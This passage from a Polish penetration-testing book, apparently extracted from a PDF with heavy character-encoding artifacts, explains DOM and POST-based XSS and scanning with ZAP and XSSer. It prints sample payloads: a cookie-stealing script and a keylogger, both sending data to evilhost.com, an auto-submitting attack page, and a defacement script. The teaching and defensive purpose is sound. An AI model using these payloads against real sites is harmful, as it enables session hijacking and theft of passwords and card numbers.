us(cid:239)ugi skracania adresów, aby ukry(cid:202) swój d(cid:239)ugi i dziwnie wygl(cid:200)daj(cid:200)cy adres, mog(cid:200)cy wzbudza(cid:202) w(cid:200)tpliwo(cid:258)ci u potencjalnej ofiary, to atak ma naprawd(cid:218) du(cid:285)(cid:200) szans(cid:218) powodzenia. Na poni(cid:285)szym schemacie przedstawiona jest sytuacja, w której ofiara zostaje sztuczk(cid:200) nak(cid:239)oniona do klikni(cid:218)cia adresu URL dostarczaj(cid:200)cego do aplikacji skrypt, który nast(cid:218)pnie zostaje zwrócony do przegl(cid:200)darki bez odpowiedniego sprawdzenia: Ataki XSS na DOM Trzeci rodzaj ataków XSS ma charakter lokalny i jest skierowany bezpo(cid:258)rednio na przegl(cid:200)dark(cid:218) internetow(cid:200) ofiary. W tym przypadku, w odró(cid:285)nieniu od dwóch poprzednich rodzajów ataku, napastnik nie wysy(cid:239)a szkodliwej tre(cid:258)ci do serwera, czekaj(cid:200)c na zwrócenie jej potem do przegl(cid:200)dar- ki, która traktuje otrzymany kod jako zaufan(cid:200) tre(cid:258)(cid:202) aplikacji i wykonuje go podczas (cid:239)adowania strony. W atakach XSS na DOM wykonywany jest tylko legalny skrypt dostarczony przez serwer. 161 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Coraz wi(cid:218)cej stron HTML-owych jest generowanych nie przez serwer, tylko przez skrypty Java- Scriptu pobierane przez klienta z serwera. Za ka(cid:285)dym razem gdy od(cid:258)wie(cid:285)ana jest tylko cz(cid:218)(cid:258)(cid:202) strony, wykorzystywany jest kod JavaScriptu. Typowym przyk(cid:239)adem jest witryna na (cid:285)ywo przedsta- wiaj(cid:200)ca wyniki meczu. Sekcja z wynikami jest w niej aktualizowana w równych odst(cid:218)pach czasu. Ataki XSS na DOM wykorzystuj(cid:200) taki legalny kod przeznaczony do wykonania przez klienta. W tym ataku najwa(cid:285)niejsze jest to, (cid:285)e legalny skrypt na podstawie danych wprowadzanych przez u(cid:285)ytkownika dodaje tre(cid:258)(cid:202) HTML-a do strony, która nast(cid:218)pnie zostaje wy(cid:258)wietlona w oknie przegl(cid:200)darki. Przeanalizujemy konkretny przyk(cid:239)ad ataku XSS na DOM: 1. Wyobra(cid:283) sobie stron(cid:218) internetow(cid:200), która ma wy(cid:258)wietla(cid:202) dostosowan(cid:200) tre(cid:258)(cid:202) w zale(cid:285)no(cid:258)ci od nazwy miasta podanej w adresie URL. Nazwa ta jest równie(cid:285) wy(cid:258)wietlana na stronie HTML-owej w przegl(cid:200)darce u(cid:285)ytkownika: http://www.cityguide.com/index.html?city=Mumbai 2. Gdy przegl(cid:200)darka otrzyma powy(cid:285)szy adres, wysy(cid:239)a do http://www.cityguide.com/ (cid:285)(cid:200)danie strony internetowej. W przegl(cid:200)darce u(cid:285)ytkownika nast(cid:218)puje pobranie i wykonanie legalnego kodu JavaScriptu, który dodaje do nag(cid:239)ówka strony nazw(cid:218) miasta. Nazwa ta pochodzi z adresu URL (w tym przypadku jest to Mumbai), a wi(cid:218)c stanowi parametr pozostaj(cid:200)cy pod kontrol(cid:200) u(cid:285)ytkownika. 3. Jak napisa(cid:239)em wcze(cid:258)niej, w atakach XSS na DOM szkodliwych skryptów nie wysy(cid:239)a si(cid:218) do serwera. Jest to mo(cid:285)liwe dzi(cid:218)ki dodaniu do adresu URL znaku #, który powoduje, (cid:285)e wszystko, co znajduje si(cid:218) za nim, nie zostanie wys(cid:239)ane. W efekcie dzia(cid:239)aj(cid:200)cy na serwerze kod nie ma dost(cid:218)pu do tej cz(cid:218)(cid:258)ci adresu, mimo (cid:285)e mo(cid:285)e z niej korzysta(cid:202) kod dzia(cid:239)aj(cid:200)cy na kliencie. Przyk(cid:239)adowy szkodliwy adres URL skonstruowany wed(cid:239)ug tej zasady mo(cid:285)e wygl(cid:200)da(cid:202) tak: http://www.cityguide.com/index.html?#city= script function /script 4. Podczas (cid:239)adowania strony przegl(cid:200)darka znajduje legalny skrypt, który pobiera z adresu URL nazw(cid:218) miasta do wstawienia do kodu HTML-a. W tym przypadku jednak skrypt otrzymuje nie nazw(cid:218) miasta, tylko skrypt, który dodaje do (cid:283)ród(cid:239)a strony. Podczas jej renderowania przegl(cid:200)darka wykonuje ten skrypt, co oznacza udane przeprowadzenie ataku XSS na DOM. Na rysunku na nast(cid:218)pnej stronie schematycznie przedstawiono zasad(cid:218) wykonywania ataku XSS na DOM: Obrona przed atakami XSS na DOM Poniewa(cid:285) szkodliwa tre(cid:258)(cid:202) wykorzystywana w ataku XSS na DOM nie trafia do serwera, nie da si(cid:218) jej wykry(cid:202) za pomoc(cid:200) technik serwerowych. Oczywi(cid:258)cie problem dotyczy sposobu dzia(cid:239)ania aplikacji, ale le(cid:285)y po stronie kodu wykonywanego u klienta. Jedn(cid:200) z podstawowych metod obrony jest rezygnacja z budowania stron HTML-owych za pomoc(cid:200) skryptów wykonywanych w przegl(cid:200)darce. 162 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Czasami nie da si(cid:218) unikn(cid:200)(cid:202) odbierania danych od u(cid:285)ytkownika w kodzie lokalnym i wówczas najlepszym rozwi(cid:200)zaniem jest nieu(cid:285)ywanie ryzykownych elementów HTML-a i metod Java- Scriptu. Z poni(cid:285)szych rozwi(cid:200)za(cid:241) nale(cid:285)y korzysta(cid:202) z najwi(cid:218)ksz(cid:200) ostro(cid:285)no(cid:258)ci(cid:200): (cid:81) document.write(): document.write( City name= +userinput); (cid:81) element.innerHTML: element.innerHTML= div +userinput + /div ; (cid:81) eval; var UserInput= Mumbai ;alert(x); ; eval( document.forms[0]. + Cityname= +txtUserInput); Dodatkowo dane przekazywane przez u(cid:285)ytkownika mo(cid:285)na kodowa(cid:202) przed ich u(cid:285)yciem w kodzie klienckim. Mo(cid:285)na tak(cid:285)e korzysta(cid:202) ze znaków oddzielania (cid:239)a(cid:241)cuchów oraz opakowywa(cid:202) dane u(cid:285)ytkowników we w(cid:239)asne funkcje. Niektóre (cid:258)rodowiska JavaScriptu maj(cid:200) te(cid:285) wbudowane mecha- nizmy ochrony przed atakami na DOM. Kodowanie oznacza tak(cid:200) modyfikacj(cid:218) danych przekazywanych przez u(cid:285)ytkownika, aby przegl(cid:200)darka mog(cid:239)a je zinterpretowa(cid:202) tylko jako zwyk(cid:239)e dane, a nie kod (cid:283)ród(cid:239)owy. Polega to np. na zamianie wszystkich znaków typu i na encje lt; i gt;. 163 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Ataki XSS z u(cid:285)yciem metody POST W opisanym wcze(cid:258)niej przyk(cid:239)adzie refleksyjnego ataku XSS u(cid:285)yta zosta(cid:239)a metoda GET, która znacznie u(cid:239)atwia hakerowi wstrzykiwanie danych, poniewa(cid:285) wystarczy tylko spreparowa(cid:202) odpo- wiedni adres URL ze skryptem i za pomoc(cid:200) sztuczki sk(cid:239)oni(cid:202) u(cid:285)ytkownika do jego klikni(cid:218)cia. Kiedy strona internetowa przekazuje dane od u(cid:285)ytkownika za pomoc(cid:200) metody POST, napastnik chc(cid:200)cy przeprowadzi(cid:202) atak XSS musi troch(cid:218) bardziej si(cid:218) napracowa(cid:202). Metoda POST uniemo(cid:285)liwia bezpo(cid:258)rednie wstrzykni(cid:218)cie skryptu, poniewa(cid:285) dane wej(cid:258)ciowe nie s(cid:200) przesy(cid:239)ane w adresie URL. Napastnik musi znale(cid:283)(cid:202) niebezpo(cid:258)redni sposób na wstrzykni(cid:218)cie swojego skryptu do aplikacji. Poni(cid:285)ej znajduje si(cid:218) opis takiego procesu oparty na konkretnym przyk(cid:239)adzie. Powiedzmy, (cid:285)e pewna strona internetowa zawiera wyszukiwark(cid:218) podatn(cid:200) na ataki XSS i gdy napastnik wstrzykuje skrypt do pola wyszukiwania na tej stronie, zostaje on zwrócony do prze- gl(cid:200)darki bez jakiejkolwiek weryfikacji. Poni(cid:285)ej znajduje si(cid:218) przyk(cid:239)adowy kod HTML-a takiej strony: html body form name= query method= post action= /search.php input type= text name= search_input value= input type= submit value= wy(cid:258)lij /form /body /html Jednym ze sposobów na przeprowadzenie ataku XSS przy u(cid:285)yciu metody POST jest nak(cid:239)onienie u(cid:285)ytkownika za pomoc(cid:200) sztuczki do wype(cid:239)nienia znajduj(cid:200)cego si(cid:218) na stronie napastnika formu- larza i klikni(cid:218)cia przycisku zatwierdzaj(cid:200)cego. Po tym zdarzeniu aplikacja przenios(cid:239)aby u(cid:285)ytkowni- ka do podatnej na ataki witryny, zamieniaj(cid:200)c dane u(cid:285)ytkownika na szkodliwy skrypt. Próba zmuszenia u(cid:285)ytkownika do tego, by wype(cid:239)ni(cid:239) formularz w witrynie napastnika, ma ma(cid:239)e szanse powodzenia i rzadko ko(cid:241)czy si(cid:218) sukcesem. Dlatego nale(cid:285)y zastosowa(cid:202) rozwi(cid:200)zanie auto- matyczne, polegaj(cid:200)ce na wstawieniu szkodliwego skryptu i (cid:285)(cid:200)dania POST do podatnej aplikacji bezpo(cid:258)rednio na stron(cid:218) kontrolowan(cid:200) przez napastnika. Zastanówmy si(cid:218), jak taka strona powinna by(cid:202) zbudowana. Kontrolowana przez hakera witryna znajduje si(cid:218) pod adresem: http://www. evilattacker.com i (cid:239)aduje podatn(cid:200) na ataki stron(cid:218): http://www.xssvulnerable.org/search.php. Gdy kto(cid:258) wejdzie pod adres evilattacker.com, zostaje wywo(cid:239)ana funkcja onload, wskutek czego przegl(cid:200)- darka wysy(cid:239)a do podatnej witryny metod(cid:200) POST (cid:285)(cid:200)danie HTTP zawieraj(cid:200)ce specjalny kod i aby do tego dosz(cid:239)o, ofiara nie musi nawet klika(cid:202) (cid:285)adnego przycisku. Oto przyk(cid:239)adowy kod tej strony: html head body onload= evilsearch.submit(); form method= post action= http://www.xssvulnerable.org/search.php name= evilsearch 164 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF input name= search_input value= SCRIPT alert( XSS ) / SCRIPT input type= submit class= button name= submit /form /body /html Stosuj(cid:200)c t(cid:218) technik(cid:218), napastnik nie potrzebuje wype(cid:239)nienia formularza przez u(cid:285)ytkownika. Wystarczy, (cid:285)e nak(cid:239)oni go do wej(cid:258)cia na kontrolowan(cid:200) przez siebie stron(cid:218) internetow(cid:200). XSS i JavaScript — (cid:258)miertelna mieszanka Hakerzy bardzo pomys(cid:239)owo wykorzystuj(cid:200) luki XSS, a dodatek JavaScriptu jeszcze zwi(cid:218)ksza ich mo(cid:285)liwo(cid:258)ci. Techniki XSS w po(cid:239)(cid:200)czeniu z JavaScriptem mog(cid:200) by(cid:202) stosowane do przeprowadzania nast(cid:218)puj(cid:200)cych rodzajów ataków: (cid:81) przechwytywanie kont; (cid:81) zmienianie tre(cid:258)ci; (cid:81) podmienianie tre(cid:258)ci ca(cid:239)ych witryn; (cid:81) skanowanie portów z komputera ofiary; (cid:81) rejestrowanie naciskanych klawiszy; (cid:81) kradzie(cid:285) informacji z przegl(cid:200)darki. Poni(cid:285)ej dok(cid:239)adniej omawiam kilka przyk(cid:239)adów. Kradzie(cid:285) ciasteczek Ka(cid:285)da dyskusja na temat ataków typu XSS zaczyna si(cid:218) od tego, jak przy u(cid:285)yciu technik XSS i JavaScriptu mo(cid:285)na zdoby(cid:202) dane z ciasteczek. Wykradzione ciasteczka haker mo(cid:285)e wykorzysta(cid:202) w celu podszycia si(cid:218) pod ofiar(cid:218) na czas sesji, czyli do momentu a(cid:285) u(cid:285)ytkownik wyloguje si(cid:218) z aplikacji. W(cid:239)asno(cid:258)(cid:202) document.cookie struktury DOM dokumentu HTML-a zwraca warto(cid:258)ci wszystkich cia- steczek przypisanych do bie(cid:285)(cid:200)cej sesji. Napastnik mo(cid:285)e wi(cid:218)c np. wstrzykn(cid:200)(cid:202) do sekcji komentarzy witryny podatnej na ataki typu XSS poni(cid:285)szy kod: script language= JavaScript Document.location= http://www.evilhost.com/cookielogger.php?cookie= +document.cookie; /script 165 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Gdy u(cid:285)ytkownik otworzy t(cid:218) stron(cid:218), nast(cid:218)puje tak(cid:285)e pobranie dotycz(cid:200)cych jej komentarzy, w któ- rych znajduje si(cid:218) powy(cid:285)szy skrypt wysy(cid:239)aj(cid:200)cy ciasteczko do nale(cid:285)(cid:200)cego do napastnika serwera evilhost.com. Je(cid:258)li zostanie ustawiona flaga HttpOnly, która jest opcjonaln(cid:200) flag(cid:200) ciasteczek, JavaScript nie b(cid:218)dzie mie(cid:202) dost(cid:218)pu do ciasteczka. Rejestrowanie naciskanych klawiszy Wstrzykuj(cid:200)c specjalny skrypt JavaScriptu, napastnik mo(cid:285)e te(cid:285) zarejestrowa(cid:202), jakie klawisze naci- ska ofiara, i w ten sposób zdoby(cid:202) jej has(cid:239)a, nazwy u(cid:285)ytkownika, numery kart kredytowych itd., które mo(cid:285)e przes(cid:239)a(cid:202) do swojego serwera. Poni(cid:285)ej znajduje si(cid:218) przyk(cid:239)adowy prosty skrypt rejestruj(cid:200)cy wszystkie naciskane klawisze: script document.onkeypress = function(e) var img = new Image(); img.src= http://www.evilhost.com/keylogger.php?data= +e.which; /script Gdy u(cid:285)ytkownik naci(cid:258)nie jaki(cid:258) klawisz, nast(cid:218)puje uruchomienie zdarzenia onkeypress. Powoduje to utworzenie obiektu o nazwie e dla ka(cid:285)dego klawisza, który zosta(cid:239) naci(cid:258)ni(cid:218)ty. S(cid:239)owo kluczowe which jest w(cid:239)asno(cid:258)ci(cid:200) obiektu e przechowuj(cid:200)c(cid:200) kod naci(cid:258)ni(cid:218)tego klawisza. Zmiana wygl(cid:200)du witryny Ataki, w wyniku których dochodzi do ca(cid:239)kowitej zmiany wygl(cid:200)du witryny, nazywaj(cid:200) si(cid:218) po angiel- sku website defacing. Najcz(cid:218)(cid:258)ciej przeprowadzaj(cid:200) je aktywi(cid:258)ci pragn(cid:200)cy wypromowa(cid:202) swoj(cid:200) dzia(cid:239)alno(cid:258)(cid:202). W(cid:239)asno(cid:258)(cid:202) document.body.innerHTML umo(cid:285)liwia manipulowanie z poziomu JavaScriptu zawarto(cid:258)ci(cid:200) za(cid:239)adowanej strony HTML-owej. Stworzono j(cid:200) do legalnych celów, ale, jak wszystko inne, napastnik mo(cid:285)e j(cid:200) wykorzysta(cid:202) w z(cid:239)ej wierze — w tym przypadku do podmiany zawarto(cid:258)ci stron. Gdy do aplikacji zostanie wstrzykni(cid:218)ty poni(cid:285)szy skrypt, zawarto(cid:258)(cid:202) bie(cid:285)(cid:200)cej strony zostanie zamie- niona na napis TA WITRYNA PAD(cid:146)A OFIAR(cid:107) ATAKU: script document.body.innerHTML= div style=visibility:visible; h1 (cid:180)TA WITRYNA PAD(cid:146)A OFIAR(cid:107) ATAKU /h1 /div ; /script 166 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Skanowanie w poszukiwaniu luk typu XSS System Kali Linux zawiera liczne narz(cid:218)dzia do automatyzacji procesu szukania luk XSS. Najbar- dziej (cid:285)mudna, ale i najskuteczniejsza jest metoda r(cid:218)czna, w ramach której przechwytuje si(cid:218) (cid:285)(cid:200)da- nie HTTP za pomoc(cid:200) po(cid:258)rednika, zmienia si(cid:218) zawarto(cid:258)(cid:202) pól oraz wstawia si(cid:218) w(cid:239)asn(cid:200) tre(cid:258)(cid:202). Poniewa(cid:285) aplikacje staj(cid:200) si(cid:218) coraz bardziej skomplikowane, zawieraj(cid:200) wiele pól, w(cid:258)ród których bardzo (cid:239)atwo przy r(cid:218)cznym przegl(cid:200)dzie pomin(cid:200)(cid:202) te podatne na ataki. Dlatego te(cid:285) technika r(cid:218)czna jest wskazana jedynie, gdy trzeba bardzo dok(cid:239)adnie przeanalizowa(cid:202) wybrany parametr. Z punktu widzenia napastnika automatyzacja zadania identyfikacji podatnych parametrów jest korzystna, poniewa(cid:285) znacznie skraca czas potrzebny na opracowanie eksploita. W Kali Linuksie znajduje si(cid:218) kilka narz(cid:218)dzi do automatycznego skanowania aplikacji w poszukiwaniu luk XSS. W tej sekcji opisuj(cid:218) nast(cid:218)puj(cid:200)ce programy: (cid:81) OWASP Zed Attack Proxy, (cid:81) XSSer, (cid:81) w3af. Zed Attack Proxy Program Zed Attack Proxy (ZAP) to narz(cid:218)dzie open source do przeprowadzania testów penetra- cyjnych na aplikacjach sieciowych. Ten prowadzony przez OWASP projekt jest ga(cid:239)(cid:218)zi(cid:200) proxy Paros. W Kali Linuksie 2.0 dost(cid:218)pna jest wersja 2.4.1. Jej najwa(cid:285)niejsze funkcje to: (cid:81) proxy przechwytuj(cid:200)cy ruch; (cid:81) skaner aktywny i pasywny; (cid:81) brute force; (cid:81) fuzzing; (cid:81) obs(cid:239)uga szerokiego spektrum j(cid:218)zyków zabezpiecze(cid:241). Standardowo ZAP dzia(cid:239)a jako pasywny proxy, tzn. nie przechwytuje aktywnie ruchu, dopóki u(cid:285)yt- kownik nie ustawi punktu wstrzymania na adresie URL, wobec którego chcia(cid:239)by przechwyci(cid:202) (cid:285)(cid:200)danie i odpowied(cid:283). ZAP mo(cid:285)na znale(cid:283)(cid:202) w sekcji Applications/Web Application Analysis (aplika- cje/analiza aplikacji sieciowych). W tym przypadku narz(cid:218)dzia ZAP u(cid:285)yjemy do identyfikacji luk XSS w aplikacjach sieciowych. Podobnie jak w przypadku ka(cid:285)dego po(cid:258)rednika (ang. proxy), najpierw nale(cid:285)y skonfigurowa(cid:202) przegl(cid:200)dark(cid:218) internetow(cid:200) tak, aby przesy(cid:239)a(cid:239)a przez niego ruch. Przegl(cid:200)dark(cid:218) mo(cid:285)na skonfiguro- wa(cid:202) w(cid:239)asnor(cid:218)cznie albo za pomoc(cid:200) specjalnego dodatku o nazwie FoxyProxy do Firefoksa, który te(cid:285) wymaga wst(cid:218)pnej konfiguracji. Po jej dokonaniu pozostaje wybra(cid:202) ustawienia proxy z menu rozwijanego, jak pokazano na poni(cid:285)szym rysunku: 167 Poleć książkęKup książkę Kali Linux. Testy penetracyjne ZAP to wszechstronne narz(cid:218)dzie do testowania aplikacji sieciowych. Na karcie Sites (witryny), znajduj(cid:200)cej si(cid:218) w lewym górnym rogu okna, znajduje si(cid:218) lista wszystkich odwiedzonych serwisów. Podczas przegl(cid:200)dania portalu program prowadzi w tle pasywne skanowanie i próbuje wykry(cid:202) luki za pomoc(cid:200) analizy stron. Narz(cid:218)dzie sprawdza (cid:285)(cid:200)dania i odpowiedzi HTTP, aby stwierdzi(cid:202), czy istnieje mo(cid:285)liwo(cid:258)(cid:202) wyst(cid:218)po- wania jakiej(cid:258) luki w zabezpieczeniach. Wykryte usterki wy(cid:258)wietla na znajduj(cid:200)cej si(cid:218) u do(cid:239)u okna karcie Alerts (powiadomienia). Na rysunku na nast(cid:218)pnej stronie wida(cid:202), (cid:285)e program znalaz(cid:239) cia- steczka ustawiane bez u(cid:285)ycia znacznika HTTPOnly: 168 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Okre(cid:258)lanie zakresu i wybór trybów Po skonfigurowaniu przegl(cid:200)darki do wspó(cid:239)pracy z ZAP program ten wy(cid:258)wietla wszystkie odwie- dzane strony w okienku Sites po lewej stronie. Podczas testu penetracyjnego wa(cid:285)ne jest, aby zidentyfikowa(cid:202) okre(cid:258)lone cele, dlatego nale(cid:285)y zdefiniowa(cid:202) zakres witryn. W tym celu kliknij prawym przyciskiem myszy interesuj(cid:200)cy Ci(cid:218) adres URL, rozwi(cid:241) menu Include in Context (dodaj do kontekstu) i kliknij pozycj(cid:218) New context (nowy kontekst), aby utworzy(cid:202) nowy zakres dla tego adresu. Adresy dodane do zakresu s(cid:200) oznaczone specjaln(cid:200) ikon(cid:200): . Je(cid:285)eli w witrynie stosowane jest uwierzytelnianie za pomoc(cid:200) formularza i tre(cid:258)(cid:202) mo(cid:285)na obejrze(cid:202) tylko po zalogowaniu, adres URL strony uwierzytelniania nale(cid:285)y oznaczy(cid:202) jako Form-based Auth Login request ((cid:285)(cid:200)danie autoryzacji logowania za pomoc(cid:200) formularza), jak pokazano na poni(cid:285)szym rysunku: 169 Poleć książkęKup książkę Kali Linux. Testy penetracyjne W oknie konfiguracji wybierz opcj(cid:218) Authentication (uwierzytelnianie), a nast(cid:218)pnie skonfiguruj parametry nazwy u(cid:285)ytkownika i has(cid:239)a. W opcji Users (u(cid:285)ytkownicy) zdefiniuj nazw(cid:218) u(cid:285)ytkownika i has(cid:239)o, a nast(cid:218)pnie wybierz tego u(cid:285)ytkownika w opcji Forced User (wymuszany u(cid:285)ytkownik): Po skonfigurowaniu tych trzech opcji w oknie g(cid:239)ównym zostanie aktywowana opcja Forced User Mode (tryb u(cid:285)ytkownika wymuszonego): Po w(cid:239)(cid:200)czeniu opcji Forced User Mode ka(cid:285)de (cid:285)(cid:200)danie przesy(cid:239)ane przez ZAP b(cid:218)dzie automatycznie uwierzytelniane. Je(cid:285)eli u(cid:285)ytkownik zostanie wylogowany podczas skanowania, automatycznie nast(cid:200)pi ponowne zalogowanie. Tryby dzia(cid:239)ania ZAP mo(cid:285)na skonfigurowa(cid:202) do dzia(cid:239)ania w kilku trybach. W lewym górnym rogu okna znajduje si(cid:218) lista rozwijana zawieraj(cid:200)ca trzy tryby: (cid:81) Safe mode (tryb bezpieczny) — w tym trybie ZAP skanuje aplikacj(cid:218) w sposób nieintruzyjny, tzn. dzia(cid:239)a jak skaner pasywny, próbuj(cid:200)c zidentyfikowa(cid:202) najprostsze b(cid:239)(cid:218)dy, takie jak mo(cid:285)liwo(cid:258)(cid:202) przegl(cid:200)dania katalogów czy wycieki informacji. Narz(cid:218)dzie aktywnie nie wchodzi w interakcje z aplikacj(cid:200), wi(cid:218)c nie ma mo(cid:285)liwo(cid:258)ci wykrycia powa(cid:285)nych b(cid:239)(cid:218)dów zabezpiecze(cid:241), takich jak luki XSS. 170 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF (cid:81) Protected mode (tryb chroniony) — wybieraj(cid:200)c tryb chroniony, mo(cid:285)na stosowa(cid:202) agresywne techniki skanowania w odniesieniu do adresu URL okre(cid:258)lonego w zakresie. (cid:81) Standard mode (tryb standardowy) — w tym trybie mo(cid:285)na stosowa(cid:202) wszystkie agresywne metody skanowania, bez wzgl(cid:218)du na to, czy dany adres URL jest w zakresie, czy nie. Polityka skanowania i atak Za pomoc(cid:200) narz(cid:218)dzia ZAP mo(cid:285)na szuka(cid:202) wszystkich najwa(cid:285)niejszych luk w zabezpieczeniach, ale my wykorzystamy go przede wszystkim do szukania luk umo(cid:285)liwiaj(cid:200)cych przeprowadzanie ataków XSS. W zwi(cid:200)zku z tym musimy zdefiniowa(cid:202) polityk(cid:218) skanowania, aby skonfigurowa(cid:202) regu(cid:239)y XSS w ramach aktywnego skanowania. Na górze znajduje si(cid:218) menu o nazwie Analyse (analizuj), w którym nale(cid:285)y klikn(cid:200)(cid:202) pozycj(cid:218) Scan Policy (polityka skanowania). Spowoduje to otwarcie okna konfiguracji. Obok nazwy ka(cid:285)dego testu znajduj(cid:200) si(cid:218) opcje Threshold (próg) i Strength (moc) — zobacz rysunek na nast(cid:218)pnej stronie. Poni(cid:285)ej znajduje si(cid:218) szczegó(cid:239)owy opis tych opcji: (cid:81) Threshold — ta opcja okre(cid:258)la poziom niezawodno(cid:258)ci luk wykrytych w te(cid:258)cie. Ustawienie Low (niski) powoduje, (cid:285)e cz(cid:218)(cid:258)ciej b(cid:218)d(cid:200) wyst(cid:218)powa(cid:202) fa(cid:239)szywe wyniki dodatnie. Ustawienie High (wysoki) pozwala znale(cid:283)(cid:202) mniej luk. Wprawdzie dzi(cid:218)ki temu otrzymamy mniej fa(cid:239)szywych wyników dodatnich, ale jednocze(cid:258)nie mo(cid:285)emy przeoczy(cid:202) co(cid:258) wa(cid:285)nego. Dlatego najlepiej jest wybra(cid:202) ustawienie po(cid:258)rednie, czyli opcj(cid:218) Medium. (cid:81) Strength — ta opcja okre(cid:258)la liczb(cid:218) testów, które ZAP ma wykona(cid:202) w celu potwierdzenia istnienia luki. Wybór ustawienia Low sprawi, (cid:285)e ZAP przetestuje wykryt(cid:200) luk(cid:218) przy u(cid:285)yciu mniejszej liczby pakietów danych i test szybciej dobiegnie ko(cid:241)ca. Z drugiej strony, ustawienie High zapewni wypróbowanie 171 Poleć książkęKup książkę Kali Linux. Testy penetracyjne wi(cid:218)kszej liczby metod ataku, co wyd(cid:239)u(cid:285)y czas trwania testu. Opcja Insane (bez umiaru), jak wskazuje nazwa, powoduje wykonanie bardzo du(cid:285)ej liczby ataków i powinno si(cid:218) z niej korzysta(cid:202) tylko w warunkach laboratoryjnych i w (cid:258)rodowiskach kontrolowanych. Aby skonfigurowa(cid:202) polityk(cid:218) dotycz(cid:200)c(cid:200) luk XSS, nale(cid:285)y poda(cid:202) jej nazw(cid:218) i z lewej strony w sekcji Injection wy(cid:239)(cid:200)czy(cid:202) wszystkie testy z wyj(cid:200)tkiem cross-site scripting (persistent) i cross-site scripting (reflected). Je(cid:258)li zamierzasz jeszcze kiedy(cid:258) wykorzysta(cid:202) t(cid:218) polityk(cid:218), kliknij przycisk Save Policy (zapisz polityk(cid:218)). Nast(cid:218)pnie kliknij prawym przyciskiem myszy docelowy adres URL i przejd(cid:283) do Attack/Active scan all in scope (atak/aktywne skanowanie wszystkich w zakresie). W efekcie ZAP rozpocznie swoje czary i wy(cid:258)wietli powiadomienia o wszystkich znalezionych lukach XSS u do(cid:239)u okna na karcie Alerts. Klikni(cid:218)cie jednego z powiadomie(cid:241) spowoduje wy(cid:258)wie- tlenie wys(cid:239)anego do serwera (cid:285)(cid:200)dania HTTP, które spowodowa(cid:239)o ujawnienie luki. Na rysunku na nast(cid:218)pnej stronie wida(cid:202), (cid:285)e wstrzykni(cid:218)to skrypt do parametru author. XSSer Program Cross Site Scripter (XSSer) to narz(cid:218)dzie do automatycznego wykrywania i wykorzy- stywania luk XSS. W Kali Linuksie dost(cid:218)pna jest wersja 1.6 (beta). Program ten zawiera kilka opcji umo(cid:285)liwiaj(cid:200)cych obej(cid:258)cie filtrów danych wej(cid:258)ciowych zaimplementowanych przez twórców atakowanej aplikacji. 172 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Funkcje Oto niektóre najwa(cid:285)niejsze funkcje programu XSSer: (cid:81) narz(cid:218)dzie wiersza polece(cid:241) i interfejs graficzny; (cid:81) wy(cid:258)wietlanie szczegó(cid:239)owych danych dotycz(cid:200)cych ataku; (cid:81) wstrzykiwanie kodu za pomoc(cid:200) metod GET i POST; (cid:81) mo(cid:285)liwo(cid:258)(cid:202) dodania ciasteczka w odniesieniu do witryn wymagaj(cid:200)cych uwierzytelniania; (cid:81) mo(cid:285)liwo(cid:258)(cid:202) ustawiania ró(cid:285)nych pól nag(cid:239)ówka HTTP, np. Referrer i User-Agent; (cid:81) ró(cid:285)ne techniki obchodzenia filtrów, np. stosowanie kodowania dziesi(cid:218)tnego i szesnastkowego oraz korzystanie z funkcji unescape(). Graficzny interfejs u(cid:285)ytkownika (ang. graphical user interface — GUI) programu XSSer mo(cid:285)na uruchomi(cid:202) wprost z poziomu pow(cid:239)oki za pomoc(cid:200) opcji -gtk. Zawiera on tak(cid:285)e kreator dla nowych u(cid:285)ytkowników, który zadaje kilka pyta(cid:241) i na podstawie otrzymanych odpowiedzi tworzy szablon. Po zdefiniowaniu wszystkich opcji dotycz(cid:200)cych planowanego testu nale(cid:285)y klikn(cid:200)(cid:202) przycisk Aim (celuj), aby pozwoli(cid:202) programowi dzia(cid:239)a(cid:202) (zobacz rysunek na nast(cid:218)pnej stronie). Skrót gtk oznacza Gimp Toolkit, czyli zestaw narz(cid:218)dzi u(cid:285)ywany przez programistów do tworzenia graficznych interfejsów do programów. 173 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Do(cid:258)wiadczeni hakerzy wol(cid:200) pos(cid:239)ugiwa(cid:202) si(cid:218) wierszem polece(cid:241). Za pomoc(cid:200) polecenia xsser -help mo(cid:285)na wy(cid:258)wietli(cid:202) list(cid:218) obs(cid:239)ugiwanych przez narz(cid:218)dzie opcji. Najwa(cid:285)niejsze polecenia s(cid:200) wymie- nione w poni(cid:285)szej tabeli: Opcja -u -g -p --heuristic --cookie -s -v Opis Okre(cid:258)la docelowy adres URL Wstrzykuje skrypt w okre(cid:258)lonym parametrze GET Wstrzykuje skrypt w okre(cid:258)lonym parametrze POST Próbuje si(cid:218) dowiedzie(cid:202), które znaki filtruje aplikacja Wstawia ciasteczko do (cid:285)(cid:200)dania HTTP Opcje wy(cid:258)wietlaj(cid:200)ce statystyki i pe(cid:239)ne dane wynikowe XSSer to zaawansowane narz(cid:218)dzie zawieraj(cid:200)ce znacznie wi(cid:218)cej opcji ni(cid:285) wymieniono w tej tabeli, ale ten zestaw powinien wystarczy(cid:202) na dobry pocz(cid:200)tek. Poni(cid:285)ej przedstawiam przyk(cid:239)ad testu aplikacji sieciowej podatnej na ataki XSS. Aplikacja ta wymaga uwierzytelniania, po którego dokonaniu ustawia ciasteczko identyfikuj(cid:200)ce u(cid:285)ytkownika w nast(cid:218)pnych operacjach. Ciasteczko to jest przesy(cid:239)ane w (cid:285)(cid:200)daniu za pomoc(cid:200) opcji -cookie. Para- metr do przetestowania jest przekazywany za pomoc(cid:200) opcji -g, tak jak w metodzie GET: xsser -u 